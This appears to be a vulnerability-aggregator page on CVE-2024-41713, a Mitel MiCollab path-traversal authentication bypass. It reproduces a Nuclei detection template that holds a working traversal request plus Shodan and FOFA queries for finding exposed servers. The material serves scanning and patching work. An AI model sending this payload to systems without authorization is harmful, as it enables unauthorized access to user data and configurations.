CVE-2024-41713: Mitel MiCollab - Authentication Bypass

日期: 2025-08-01 | 影响软件: Mitel MiCollab | POC: 已公开

漏洞描述

A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.

PoC代码[已公开]

id: CVE-2024-41713

info:
  name: Mitel MiCollab - Authentication Bypass
  author: DhiyaneshDK,watchTowr
  severity: high
  description: |
    A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
  impact: |
    Unauthenticated attackers can exploit path traversal to access sensitive user data, system configurations, and corrupt or delete information.
  remediation: |
    Update Mitel MiCollab to a version later than 9.8 SP1 FP2 that patches CVE-2024-41713.
  reference:
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41713
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-41713
    cwe-id: CWE-22
    epss-score: 0.9414
    epss-percentile: 0.99907
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve204,mitel,cmg-suite,auth-bypass,kev,vkev,vuln

http:
  - raw:
      - |
        GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f3d8f8120b1df7e9293135e626787489c4f1a030dbbda17447640ce0921728b9022076d08d658ecfdd79fb2f8111d205a8269e03a71915d5cc01d5b46f298bb7cf49:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-41713.yaml

相关漏洞推荐